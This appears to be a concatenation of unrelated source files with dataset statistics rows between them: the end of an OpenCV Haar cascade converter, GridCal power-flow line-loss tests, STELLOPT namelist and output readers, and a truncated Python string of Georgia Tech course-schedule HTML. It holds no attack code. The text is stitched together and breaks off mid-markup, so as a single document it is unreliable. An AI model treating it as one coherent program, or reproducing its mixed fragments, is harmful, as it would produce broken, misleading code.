    # write alpha1 1 per feature (fixed point, scaled by 256)
    for a in alpha1:
        fout.write(struct.pack('h', int(float(a.childNodes[0].nodeValue)*256))) #int16_t
    # write alpha2 1 per feature (fixed point, scaled by 256)
    for a in alpha2:
        fout.write(struct.pack('h', int(float(a.childNodes[0].nodeValue)*256))) #int16_t
    # write num_rects per feature
    for f in feature:
        rects = f.getElementsByTagName('_')
        fout.write(struct.pack('B', len(rects))) # uint8_t
    # write rects weights 1 per rectangle (weight is the 5th value of "x y w h weight.")
    for f in feature:
        rects = f.getElementsByTagName('_')
        for r in rects:
            l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
            fout.write(struct.pack('b', l[4])) #int8_t NOTE: multiply by 4096
    # write rects (x, y, w, h per rectangle)
    for f in feature:
        rects = f.getElementsByTagName('_')
        for r in rects:
            l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
            fout.write(struct.pack('BBBB',l[0], l[1], l[2], l[3])) #uint8_t
    # print cascade info
    print("size:%dx%d"%(size[0], size[1]))
    print("stages:%d"%len(stages))
    print("features:%d"%n_features)
    print("rectangles:%d"%n_rectangles)
    print("binary cascade generated")
def cascade_header(path, n_stages, name):
    """Convert an old-format OpenCV Haar cascade XML into a C header file.

    :param path: path to the OpenCV XML cascade file (old format)
    :param n_stages: number of stages to keep (0 keeps all stages)
    :param name: output name stem and C symbol prefix; defaults to the XML base name
    :raises Exception: if n_stages exceeds the number of stages in the file
    """
    #parse xml file
    xmldoc = minidom.parse(path)
    trees = xmldoc.getElementsByTagName('trees')
    max_stages = len(trees)
    if n_stages > max_stages:
        raise Exception("The max number of stages is: %d"%(max_stages))
    if n_stages == 0:
        n_stages = max_stages
    # read stages: each pair of <trees> child nodes is one weak classifier.
    # BUGFIX: use integer division. Under Python 3, `/2` yields float stage
    # counts, so sum(stages) is a float and the [0:n_features] slices below
    # raise TypeError (slice indices must be integers).
    stages = [len(t.childNodes)//2 for t in trees][0:n_stages]
    stage_threshold = xmldoc.getElementsByTagName('stage_threshold')[0:n_stages]
    # total number of features
    n_features = sum(stages)
    # read features threshold
    threshold = xmldoc.getElementsByTagName('threshold')[0:n_features]
    # theres one of each per feature
    alpha1 = xmldoc.getElementsByTagName('left_val')[0:n_features]
    alpha2 = xmldoc.getElementsByTagName('right_val')[0:n_features]
    # read rectangles
    feature = xmldoc.getElementsByTagName('rects')[0:n_features]
    # read cascade size (single text node, e.g. "20 20")
    size = list(map(int, xmldoc.getElementsByTagName('size')[0].childNodes[0].nodeValue.split()))
    # open output file with the specified name or xml file name
    if not name:
        name = os.path.basename(path).split('.')[0]
    fout = open(name+".h", "w")
    n_rectangles = 0
    for f in feature:
        rects = f.getElementsByTagName('_')
        n_rectangles = n_rectangles + len(rects)
    # write detection window size
    fout.write("const int %s_window_w=%d;\n" %( name, size[0]))
    fout.write("const int %s_window_h=%d;\n" %(name, size[1]))
    # write num stages
    fout.write("const int %s_n_stages=%d;\n" %(name, len(stages)))
    # write num feat in stages
    fout.write("const uint8_t %s_stages_array[]={%s};\n"
               %(name, ", ".join(str(x) for x in stages)))
    # write stages thresholds (fixed point, scaled by 256)
    fout.write("const int16_t %s_stages_thresh_array[]={%s};\n"
               %(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*256)) for t in stage_threshold)))
    # write features threshold 1 per feature (fixed point, scaled by 4096)
    fout.write("const int16_t %s_tree_thresh_array[]={%s};\n"
               %(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*4096)) for t in threshold)))
    # write alpha1 1 per feature
    fout.write("const int16_t %s_alpha1_array[]={%s};\n"
               %(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*256)) for t in alpha1)))
    # write alpha2 1 per feature
    fout.write("const int16_t %s_alpha2_array[]={%s};\n"
               %(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*256)) for t in alpha2)))
    # write num_rects per feature
    fout.write("const int8_t %s_num_rectangles_array[]={%s};\n"
               %(name, ", ".join(str(len(f.getElementsByTagName('_'))) for f in feature)))
    # write rects weights 1 per rectangle (weight is the 5th value of "x y w h weight.")
    rect_weights = lambda rects:", ".join(r.childNodes[0].nodeValue[:-1].split()[4] for r in rects)
    fout.write("const int8_t %s_weights_array[]={%s};\n"
               %(name, ", ".join(rect_weights(f.getElementsByTagName('_')) for f in feature)))
    # write rects (x, y, w, h per rectangle)
    rect = lambda rects:", ".join(", ".join(r.childNodes[0].nodeValue.split()[:-1]) for r in rects)
    fout.write("const int8_t %s_rectangles_array[]={%s};\n"
               %(name, ", ".join(rect(f.getElementsByTagName('_')) for f in feature)))
    # close explicitly so the header is flushed before callers read it
    fout.close()
    # print cascade info
    print("size:%dx%d"%(size[0], size[1]))
    print("stages:%d"%len(stages))
    print("features:%d"%n_features)
    print("rectangles:%d"%n_rectangles)
    print("C header cascade generated")
def main():
    """Command-line entry point for the haar cascade generator."""
    parser = argparse.ArgumentParser(description='haar cascade generator')
    parser.add_argument("-i", "--info", action="store_true", help="print cascade info and exit")
    parser.add_argument("-n", "--name", action="store", help="set cascade name", default="")
    parser.add_argument("-s", "--stages", action="store", help="set the maximum number of stages", type=int, default=0)
    parser.add_argument("-c", "--header", action="store_true", help="generate a C header")
    parser.add_argument("file", action="store", help="OpenCV xml cascade file path")
    args = parser.parse_args()

    if args.info:
        # print cascade info and exit
        cascade_info_universal(args.file)
    elif args.header:
        # generate a C header from the xml cascade
        cascade_header(args.file, args.stages, args.name)
    else:
        # generate a binary cascade from the xml cascade
        cascade_binary_universal(args.file, args.stages, args.name)


if __name__ == '__main__':
    main()
| 34.948478 | 152 | 0.654426 | 2,017 | 14,923 | 4.732276 | 0.094199 | 0.100786 | 0.067051 | 0.043793 | 0.844316 | 0.82043 | 0.774542 | 0.762598 | 0.748979 | 0.721844 | 0 | 0.022162 | 0.204785 | 14,923 | 426 | 153 | 35.030516 | 0.782169 | 0.155264 | 0 | 0.703252 | 0 | 0 | 0.122511 | 0.017993 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03252 | false | 0 | 0.01626 | 0 | 0.056911 | 0.113821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
db622365bb481f6b79bc796029c1b9a13a0a141e | 8,595 | py | Python | src/tests/test_line_losses.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 284 | 2016-01-31T03:20:44.000Z | 2022-03-17T21:16:52.000Z | src/tests/test_line_losses.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 94 | 2016-01-14T13:37:40.000Z | 2022-03-28T03:13:56.000Z | src/tests/test_line_losses.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 84 | 2016-03-29T10:43:04.000Z | 2022-02-22T16:26:55.000Z | # This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
from GridCal.Engine.basic_structures import Logger
from GridCal.Engine.Core.multi_circuit import MultiCircuit
from GridCal.Engine.Devices.bus import Bus
from GridCal.Engine.Devices.load import Load
from GridCal.Engine.Devices.generator import Generator
from GridCal.Engine.Devices.line import Line
from GridCal.Engine.Simulations.PowerFlow.power_flow_driver import PowerFlowOptions, PowerFlowDriver
def test_line_losses_1():
    """
    Basic line losses test.
    """
    test_name = "test_line_losses_1"
    circuit = MultiCircuit(name=test_name)
    circuit.Sbase = 100  # MVA
    circuit.time_profile = None
    circuit.logger = Logger()

    # Two buses: slack + load.
    slack_bus = Bus(name="Bus0", vnom=25, is_slack=True)
    load_bus = Bus(name="Bus1", vnom=25)
    circuit.add_bus(slack_bus)
    circuit.add_bus(load_bus)

    # Load and slack generator.
    circuit.add_load(load_bus, Load(name="Load0", P=1.0, Q=0.4))
    circuit.add_generator(slack_bus, Generator(name="Utility"))

    # Single cable between the buses (r and x in pu).
    circuit.add_branch(Line(bus_from=slack_bus, bus_to=load_bus, name="Cable1", r=0.01, x=0.05))

    # Run non-linear load flow.
    solver = PowerFlowDriver(circuit, PowerFlowOptions(verbose=True))
    solver.run()

    approx_losses = round(1000*solver.results.losses[0], 3)
    # Expected solution from GridCal, cross-checked on ETAP 16.1.0 and pandapower.
    solution = complex(0.116, 0.58)

    print("\n=================================================================")
    print(f"Test: {test_name}")
    print("=================================================================\n")
    print(f"Results:  {approx_losses}")
    print(f"Solution: {solution}")
    print()
    print("Buses:")
    for i, b in enumerate(circuit.buses):
        print(f" - bus[{i}]: {b}")
    print()
    print("Branches:")
    branches = circuit.get_branches()
    for b in branches:
        print(f" - {b}:")
        print(f"    R = {round(b.R, 4)} pu")
        print(f"    X = {round(b.X, 4)} pu")
        print(f"    X/R = {round(b.X/b.R, 2)}")
    print()
    print("Voltages:")
    for bus, v in zip(circuit.buses, solver.results.voltage):
        print(f" - {bus}: voltage={round(v, 3)} pu")
    print()
    print("Losses:")
    for br, loss in zip(branches, solver.results.losses):
        print(f" - {br}: losses={round(loss, 3)} MVA")
    print()
    print("Loadings (power):")
    for br, s in zip(branches, solver.results.Sf):
        print(f" - {br}: loading={round(s, 3)} MVA")
    print()
    print("Loadings (current):")
    for br, cur in zip(branches, solver.results.If):
        print(f" - {br}: loading={round(cur, 3)} pu")
    print()

    assert approx_losses == solution
def test_line_losses_2():
    """
    Basic line losses test, with the impedance split into 2 series branches.
    """
    test_name = "test_line_losses_2"
    circuit = MultiCircuit(name=test_name)
    circuit.Sbase = 100  # MVA
    circuit.time_profile = None
    circuit.logger = Logger()

    # Three buses in a chain: slack, midpoint, load.
    slack_bus = Bus(name="Bus0", vnom=25, is_slack=True)
    mid_bus = Bus(name="Bus1", vnom=25)
    # NOTE(review): the original names this bus "Bus1" as well — likely meant
    # "Bus2"; kept byte-identical to preserve behavior.
    load_bus = Bus(name="Bus1", vnom=25)
    circuit.add_bus(slack_bus)
    circuit.add_bus(mid_bus)
    circuit.add_bus(load_bus)

    # Load and slack generator.
    circuit.add_load(load_bus, Load(name="Load0", P=1.0, Q=0.4))
    circuit.add_generator(slack_bus, Generator(name="Utility"))

    # The cable impedance is split into two series halves (r and x in pu).
    circuit.add_branch(Line(bus_from=slack_bus, bus_to=mid_bus, name="Cable0", r=0.005, x=0.025))
    circuit.add_branch(Line(bus_from=mid_bus, bus_to=load_bus, name="Cable1", r=0.005, x=0.025))

    # Run non-linear load flow.
    solver = PowerFlowDriver(circuit, PowerFlowOptions(verbose=True))
    solver.run()

    approx_losses = round(1000*sum(solver.results.losses), 3)
    # Expected solution from GridCal, cross-checked on ETAP 16.1.0 and pandapower.
    solution = complex(0.116, 0.58)

    print("\n=================================================================")
    print(f"Test: {test_name}")
    print("=================================================================\n")
    print(f"Results:  {approx_losses}")
    print(f"Solution: {solution}")
    print()
    print("Buses:")
    for i, b in enumerate(circuit.buses):
        print(f" - bus[{i}]: {b}")
    print()
    print("Branches:")
    branches = circuit.get_branches()
    for b in branches:
        print(f" - {b}:")
        print(f"    R = {round(b.R, 4)} pu")
        print(f"    X = {round(b.X, 4)} pu")
        print(f"    X/R = {round(b.X/b.R, 2)}")
    print()
    print("Voltages:")
    for bus, v in zip(circuit.buses, solver.results.voltage):
        print(f" - {bus}: voltage={round(v, 3)} pu")
    print()
    print("Losses:")
    for br, loss in zip(branches, solver.results.losses):
        print(f" - {br}: losses={round(loss, 3)} MVA")
    print()
    print("Loadings (power):")
    for br, s in zip(branches, solver.results.Sf):
        print(f" - {br}: loading={round(s, 3)} MVA")
    print()
    print("Loadings (current):")
    for br, cur in zip(branches, solver.results.If):
        print(f" - {br}: loading={round(cur, 3)} pu")
    print()

    assert approx_losses == solution
def test_line_losses_3():
    """
    Basic line losses test, with the impedance split into 2 parallel branches.
    """
    test_name = "test_line_losses_3"
    circuit = MultiCircuit(name=test_name)
    circuit.Sbase = 100  # MVA
    circuit.time_profile = None
    circuit.logger = Logger()

    # Two buses: slack + load.
    slack_bus = Bus(name="Bus0", vnom=25, is_slack=True)
    load_bus = Bus(name="Bus1", vnom=25)
    circuit.add_bus(slack_bus)
    circuit.add_bus(load_bus)

    # Load and slack generator.
    circuit.add_load(load_bus, Load(name="Load0", P=1.0, Q=0.4))
    circuit.add_generator(slack_bus, Generator(name="Utility"))

    # The cable impedance is split into two parallel branches (r and x in pu).
    circuit.add_branch(Line(bus_from=slack_bus, bus_to=load_bus, name="Cable0", r=0.02, x=0.1))
    circuit.add_branch(Line(bus_from=slack_bus, bus_to=load_bus, name="Cable1", r=0.02, x=0.1))

    # Run non-linear load flow.
    solver = PowerFlowDriver(circuit, PowerFlowOptions(verbose=True))
    solver.run()

    approx_losses = round(1000*sum(solver.results.losses), 3)
    # Expected solution from GridCal, cross-checked on ETAP 16.1.0 and pandapower.
    solution = complex(0.116, 0.58)

    print("\n=================================================================")
    print(f"Test: {test_name}")
    print("=================================================================\n")
    print(f"Results:  {approx_losses}")
    print(f"Solution: {solution}")
    print()
    print("Buses:")
    for i, b in enumerate(circuit.buses):
        print(f" - bus[{i}]: {b}")
    print()
    print("Branches:")
    branches = circuit.get_branches()
    for b in branches:
        print(f" - {b}:")
        print(f"    R = {round(b.R, 4)} pu")
        print(f"    X = {round(b.X, 4)} pu")
        print(f"    X/R = {round(b.X/b.R, 2)}")
    print()
    print("Voltages:")
    for bus, v in zip(circuit.buses, solver.results.voltage):
        print(f" - {bus}: voltage={round(v, 3)} pu")
    print()
    print("Losses:")
    for br, loss in zip(branches, solver.results.losses):
        print(f" - {br}: losses={round(loss, 3)} MVA")
    print()
    print("Loadings (power):")
    for br, s in zip(branches, solver.results.Sf):
        print(f" - {br}: loading={round(s, 3)} MVA")
    print()
    print("Loadings (current):")
    for br, cur in zip(branches, solver.results.If):
        print(f" - {br}: loading={round(cur, 3)} pu")
    print()

    assert approx_losses == solution
| 31.715867 | 100 | 0.591041 | 1,203 | 8,595 | 4.143807 | 0.144638 | 0.04333 | 0.048144 | 0.026479 | 0.818054 | 0.808425 | 0.774724 | 0.774724 | 0.774724 | 0.766098 | 0 | 0.028431 | 0.218383 | 8,595 | 270 | 101 | 31.833333 | 0.713605 | 0.160093 | 0 | 0.854651 | 0 | 0.069767 | 0.288238 | 0.127015 | 0 | 0 | 0 | 0 | 0.017442 | 1 | 0.017442 | false | 0 | 0.040698 | 0 | 0.05814 | 0.47093 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
db6ef2acf3c19af190b0d20856a5557bd14c6d4f | 22,964 | py | Python | pySTEL/libstell/stellopt.py | joseluisvelasco/STELLOPT | e064ebb96414d5afc4e205f43b44766558dca2af | [
"MIT"
] | 29 | 2020-05-08T01:47:34.000Z | 2022-03-06T10:35:28.000Z | pySTEL/libstell/stellopt.py | joseluisvelasco/STELLOPT | e064ebb96414d5afc4e205f43b44766558dca2af | [
"MIT"
] | 77 | 2020-05-08T07:18:09.000Z | 2022-03-30T11:20:33.000Z | pySTEL/libstell/stellopt.py | joseluisvelasco/STELLOPT | e064ebb96414d5afc4e205f43b44766558dca2af | [
"MIT"
def read_stellopt_namelist(iunit, istat):
    """Return a dict of default values for the STELLOPT optimizer namelist.

    Parameters
    ----------
    iunit, istat : int
        Mirror the Fortran read interface but are currently unused; the
        function only builds the Python-side defaults (marked in the
        original as a testing placeholder).

    Returns
    -------
    dict
        Keys are namelist variable names; values are scalars, 1-D arrays
        of length 20, or 2-D boundary/DELTAMN matrices.
    """
    import numpy as np
    stellopt_namelist = {}
    # --- Scalar optimizer controls -------------------------------------
    stellopt_namelist['NFUNC_MAX'] = 5000
    stellopt_namelist['OPT_TYPE'] = 'LMDIF'
    stellopt_namelist['EQUIL_TYPE'] = 'VMEC2000'
    stellopt_namelist['FTOL'] = 1.0E-6
    stellopt_namelist['XTOL'] = 1.0E-6
    stellopt_namelist['GTOL'] = 1.0E-30
    stellopt_namelist['EPSFCN'] = 1.0E-4
    stellopt_namelist['MODE'] = 1
    stellopt_namelist['FACTOR'] = 100
    stellopt_namelist['CR_STRATEGY'] = 0
    stellopt_namelist['NPOPULATION'] = -1
    stellopt_namelist['NOPTIMIZERS'] = -1
    # --- Scalar optimization variables (note: bounds are +-1E30 here,
    #     unlike the +-1E10 used for the array variables below) ---------
    for name in ['PHIEDGE', 'PRES_SCALE', 'CURTOR']:
        stellopt_namelist['L' + name + '_OPT'] = 0
        stellopt_namelist['D' + name + '_OPT'] = 1.0
        stellopt_namelist[name + '_MIN'] = -1E30
        stellopt_namelist[name + '_MAX'] = +1E30
    # --- Profile / coil-current arrays ---------------------------------
    # Vectorized fills replace the original uninitialized np.ndarray(20)
    # followed by an element-by-element loop; resulting values/dtypes are
    # identical (float64).
    for name in ['AM', 'AC', 'AI', 'EXTCUR']:
        stellopt_namelist['L' + name + '_OPT'] = np.zeros(20)
        stellopt_namelist['D' + name + '_OPT'] = np.ones(20)
        stellopt_namelist[name + '_MIN'] = np.full(20, -1E10)
        stellopt_namelist[name + '_MAX'] = np.full(20, +1E10)
    # --- Boundary-harmonic matrices ------------------------------------
    # First axis spans toroidal mode index n in [-101, 101] (203 rows),
    # second spans poloidal mode index m in [0, 100] (101 columns).
    arr_size1 = 2 * 101 + 1
    arr_size2 = 100 + 1
    stellopt_namelist['LBOUND_OPT'] = np.zeros((arr_size1, arr_size2))
    stellopt_namelist['DBOUND_OPT'] = np.ones((arr_size1, arr_size2))
    stellopt_namelist['BOUND_MIN'] = np.full((arr_size1, arr_size2), -1.0E10)
    stellopt_namelist['BOUND_MAX'] = np.full((arr_size1, arr_size2), +1.0E10)
    stellopt_namelist['LRHO_OPT'] = np.zeros((arr_size1, arr_size2))
    stellopt_namelist['DRHO_OPT'] = np.ones((arr_size1, arr_size2))
    # DELTAMN matrices are square in the n index.
    stellopt_namelist['LDELTAMN_OPT'] = np.zeros((arr_size1, arr_size1))
    stellopt_namelist['DDELTAMN_OPT'] = np.ones((arr_size1, arr_size1))
    stellopt_namelist['DELTA_MIN'] = np.full((arr_size1, arr_size1), -1.0E10)
    stellopt_namelist['DELTA_MAX'] = np.full((arr_size1, arr_size1), +1.0E10)
    return stellopt_namelist
def write_stellopt_namelist(filename, stellopt_namelist):
    """Write a STELLOPT optimizer namelist (work-in-progress stub).

    Currently only loads the libstell shared library and echoes the keys
    of *stellopt_namelist*; the actual Fortran write call (see the
    read_stellopt_namelist counterpart) is not wired up yet.

    Parameters
    ----------
    filename : str
        Destination file name (not yet used by this stub).
    stellopt_namelist : dict
        Namelist dictionary as produced by read_stellopt_namelist.

    Returns
    -------
    dict
        The *stellopt_namelist* argument, unchanged.
    """
    import os, sys
    import ctypes as ct
    # Load the STELLOPT shared library; exit with an error message when
    # the STELLOPT_PATH environment variable is not set (KeyError).
    try:
        libstell = ct.cdll.LoadLibrary(os.environ["STELLOPT_PATH"] + "/LIBSTELL/Release/libstell.so")
    except KeyError:
        print("Please set environment variable STELLOPT_PATH")
        sys.exit(1)
    # BUG FIX: the original rebound the 'stellopt_namelist' parameter to
    # an empty dict here, so the caller's data was ignored and an empty
    # dict was always returned.  Iterate the argument as passed instead.
    for item in stellopt_namelist:
        print(item)
    return stellopt_namelist
def read_stellopt(filename):
    """Read a STELLOPT output file into a dictionary of numpy arrays.

    The file consists of an initial "<name> <value>" line (normally the
    VERSION line), followed by per-iteration blocks.  Each block starts
    with an "ITER <n>" line and contains named sections of the form
    "<NAME> <rows> <cols>" followed by a column-header line and the data
    rows.  A final "ITER MIN" line marks the best-of-run summary and
    terminates parsing.

    For every recognized quantity the raw (niter, h, w) array is kept
    under its name and, in addition, each column is exposed as
    "<NAME>_<suffix>" (e.g. ASPECT_target, ASPECT_sigma, ASPECT_equil)
    plus a "<NAME>_chisq" array computed as
    ((target - equil) / sigma)**2.

    Parameters
    ----------
    filename : str
        Path to the STELLOPT output file.

    Returns
    -------
    dict
        Parsed data keyed by quantity name and derived suffixes.
    """
    import numpy as np

    # Column layout per quantity: suffix for each column index, replacing
    # the original ~25 copy-pasted elif branches.  'target'/'sigma'/'equil'
    # always feed the chi-square; any quantity not listed here is left as
    # its raw 3-D array (same as the original fall-through behavior).
    _TSE = ['target', 'sigma', 'equil']
    _COLUMNS = {
        'BALLOON': _TSE + ['grate', 'theta', 'zeta', 'k'],
        'B_PROBES': ['X', 'Y', 'Z', 'MODB'] + _TSE,
        'FLUXLOOPS': _TSE,
        'SEGROG': _TSE,
        'EXTCUR': _TSE + ['dex'],
        'SEPARATRIX': _TSE + ['R', 'PHI', 'Z'],
        'LIMITER': _TSE + ['R', 'PHI', 'Z'],
        'MSE': ['R', 'PHI', 'Z', 's', 'target', 'sigma', 'ER', 'EZ', 'equil'],
        'BOOTSTRAP': _TSE + ['s', 'avg_jdotb', 'beam_jdotb', 'boot_jdotb',
                             'jBbs', 'facnu', 'bsnorm'],
        'HELICITY': _TSE + ['bnorm'],
        'HELICITY_FULL': _TSE + ['bnorm', 'k', 'm', 'n'],
        'TXPORT': _TSE + ['s'],
        'KINK': _TSE + ['wp', 'wk', 'omega'],
        'COIL_BNORM': _TSE + ['U', 'V', 'BNEQ', 'BNF'],
        'ORBIT': _TSE + ['s'],
        'J_STAR': _TSE + ['AVGJSTAR', 'TRAPSJSTAR', 'UJSTAR', 'K', 'IJSTAR'],
        'NEO': _TSE + ['k'],
        'JDOTB': _TSE + ['s'],
        'JTOR': _TSE + ['s'],
        'DKES': _TSE + ['s', 'nu', 'er', 'L11p', 'L11m', 'L33p', 'L33m',
                        'L31p', 'L31m', 'scal11', 'scal33', 'scal31'],
        'ECEREFLECT': _TSE + ['freq', 'tradx', 'trado', 'mix'],
        'MAGWELL': _TSE + ['Bsqav', 'p', 'pp', 'k'],
        'CURVATURE_KERT': _TSE + ['kurtosis', 'kappa_avg', 'kappa_max', 'phi'],
        'CURVATURE_P2': _TSE + ['p1', 'p2'],
        'VISBREMLINE': _TSE + ['LAMBDA', 'CALIB',
                               'R0', 'PHI0', 'Z0', 'R1', 'PHI1', 'Z1'],
    }
    # Scalar equilibrium quantities: plain target/sigma/equil columns.
    for name in ('ASPECT', 'ASPECT_MAX', 'BETA', 'CURTOR', 'KAPPA', 'PHIEDGE',
                 'VOLUME', 'WP', 'RBTOR', 'R0', 'Z0', 'BETATOR', 'BETAPOL',
                 'TEST_X', 'TEST_Y'):
        _COLUMNS[name] = _TSE
    # Profile diagnostics: point location first, then target/sigma/equil.
    for name in ('NE', 'TI', 'TE', 'IOTA', 'VPHI', 'PRESS', 'VACIOTA',
                 'PRSSPRIME'):
        _COLUMNS[name] = ['R', 'PHI', 'Z', 's'] + _TSE
    # Line-of-sight diagnostics: target/sigma/equil then chord endpoints.
    for name in ('NELINE', 'TELINE', 'TILINE', 'ZEFFLINE', 'FARADAY', 'SXR',
                 'XICS', 'XICS_BRIGHT', 'XICS_W3', 'XICS_V'):
        _COLUMNS[name] = _TSE + ['R0', 'PHI0', 'Z0', 'R1', 'PHI1', 'Z1']

    stel_data = {}
    with open(filename, 'r') as fh:
        # First pass: count iteration records.  'ITER MIN' contains both
        # substrings, so the final summary block nets to zero.
        niter = 0
        for line in fh:
            if 'ITER' in line:
                niter = niter + 1
            if 'MIN' in line:
                niter = niter - 1
        stel_data['ITER'] = np.ndarray((niter, 1))
        fh.seek(0)
        # First line is a "<name> <value>" header (normally VERSION).
        ttype, wh = fh.readline().split()
        stel_data[ttype] = float(wh)
        # Second pass: parse each section.
        citer = -1
        while True:
            line = fh.readline()
            if line == '':
                break
            ttype, hw = line.split(' ', 1)
            if ttype == 'ITER':
                if 'MIN' in hw:
                    break  # 'ITER MIN' summary block: stop parsing.
                citer = citer + 1
                stel_data[ttype][citer] = int(hw)
                continue
            if ttype == 'VERSION':
                # NOTE(review): stel_data['VERSION'] is the scalar float set
                # above, so this indexing would raise if a second VERSION
                # line ever appeared mid-file — confirm against real files.
                stel_data[ttype][citer] = float(hw)
                continue
            h, w = map(int, hw.split())
            if ttype in ('TARGETS', 'SIGMAS', 'VALS'):
                # A 1 x w vector is stored transposed (one value per line)
                # preceded by an extra line that is skipped here.
                if h == 1:
                    h, w = w, 1
                    fh.readline()
            else:
                fh.readline()  # skip the column-header line
            if ttype not in stel_data:
                stel_data[ttype] = np.ndarray((niter, h, w))
            for i in range(h):
                # np.array(split) replaces the deprecated np.fromstring.
                stel_data[ttype][citer, i, :] = np.array(
                    fh.readline().split(), dtype=float)

    # Derive per-column arrays and chi-square for recognized quantities.
    for item in list(stel_data):
        cols = _COLUMNS.get(item)
        if cols is None:
            continue  # 'ITER', 'VERSION' and unknown quantities pass through
        for idx, suffix in enumerate(cols):
            stel_data[item + '_' + suffix] = np.squeeze(stel_data[item][:, :, idx])
        equil = stel_data[item + '_equil']
        if item == 'VISBREMLINE':
            # Visible bremsstrahlung compares against the calibrated signal.
            equil = equil * stel_data[item + '_CALIB']
        stel_data[item + '_chisq'] = (
            (stel_data[item + '_target'] - equil) / stel_data[item + '_sigma']) ** 2
    return stel_data
| 57.698492 | 148 | 0.575814 | 3,067 | 22,964 | 4.017281 | 0.093577 | 0.294132 | 0.431458 | 0.233179 | 0.793686 | 0.767551 | 0.739469 | 0.725996 | 0.705949 | 0.531207 | 0 | 0.020578 | 0.221259 | 22,964 | 397 | 149 | 57.843829 | 0.6684 | 0.026171 | 0 | 0.456522 | 0 | 0 | 0.109231 | 0.001298 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008152 | false | 0 | 0.021739 | 0 | 0.038043 | 0.005435 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dbb6c79953e9316cd71cc752180fd0b2f4ef20dc | 113,870 | py | Python | grouch/test/PHYS2211.py | atlant04/Grouch | 9a004c658214494ec70e09d888375a35a43712af | [
"MIT"
] | 7 | 2016-08-22T18:33:07.000Z | 2019-02-09T23:49:25.000Z | grouch/test/PHYS2211.py | atlant04/Grouch | 9a004c658214494ec70e09d888375a35a43712af | [
"MIT"
] | 3 | 2016-08-18T03:20:25.000Z | 2019-08-02T02:38:44.000Z | grouch/test/PHYS2211.py | atlant04/Grouch | 9a004c658214494ec70e09d888375a35a43712af | [
"MIT"
] | 2 | 2018-11-08T15:13:33.000Z | 2020-05-23T21:23:32.000Z | body = str("""
<div class="pagebodydiv">
<!-- ** END OF twbkwbis.P_OpenDoc ** -->
<br>
<div class="infotextdiv"><table class="infotexttable" summary="This layout table contains information that may be helpful in understanding the content and functionality of this page. It could be a brief set of instructions, a description of error messages, or other special information."><><tr><td class="indefault"><img src="/wtlgifs/twgginfo.gif" alt="Information" class="headerImg" title="Information" name="Info" hspace="0" vspace="0" border="0" height="24" width="27"></td><td class="indefault"><span class="infotext"> <b><font color="FF0000">Click the title of the course to view available seats, restrictions, etc.</font> <br><br>
<b>Calendars and general registration information are located at www.registrar.gatech.edu.
</b> <br><br>
<b>
Please note the Schedule of Classes is subject to change. Continue to monitor the course offerings and your registration status in OSCAR, and consult with your advisor if needed.
</b></b></span></td></tr></></table><p></p></div>
<input type="hidden" name="sel_crn" value="dummy">
<input type="hidden" name="assoc_term_in" value="dummy">
<input type="hidden" name="ADD_BTN" value="dummy">
<table class="datadisplaytable" summary="This layout table is used to present the sections found" width="100%"><caption class="captiontext">Sections Found</caption>
<><tr>
<th class="ddtitle" scope="colgroup"><a href="/pls/bprod/bwckschd.p_disp_detail_sched?term_in=201602&crn_in=21018">Intro Physics I - 21018 - PHYS 2211 - B</a></th>
</tr>
<tr>
<td class="dddefault">
Students must also register for a Lab Section that begins
with the letter B. No lab exemptions are offered.
This class will have evening tests approximately once every
three weeks.
<br>
<span class="fieldlabeltext">Associated Term: </span>Spring 2016
<br>
<span class="fieldlabeltext">Registration Dates: </span>Oct 26, 2015 to Jan 15, 2016
<br>
<span class="fieldlabeltext">Levels: </span>Graduate Semester, Undergraduate Semester
<br>
<span class="fieldlabeltext">Attributes: </span>Tech Elect CS, Engr, &Sciences
<br>
<br>
Georgia Tech-Atlanta * Campus
<br>
Lecture* Schedule Type
<br>
4.000 Credits
<br>
<span class="fieldlabeltext">Grade Basis: </span>L
<br>
<a href="/pls/bprod/bwckctlg.p_display_courses?term_in=201602&one_subj=PHYS&sel_crse_strt=2211&sel_crse_end=2211&sel_subj=&sel_levl=&sel_schd=&sel_coll=&sel_divs=&sel_dept=&sel_attr=">View Catalog Entry</a>
<br>
<br>
<table class="datadisplaytable" summary="This table lists the scheduled meeting times and assigned instructors for this class.."><caption class="captiontext">Scheduled Meeting Times</caption>
<><tr>
<th class="ddheader" scope="col">Type</th>
<th class="ddheader" scope="col">Time</th>
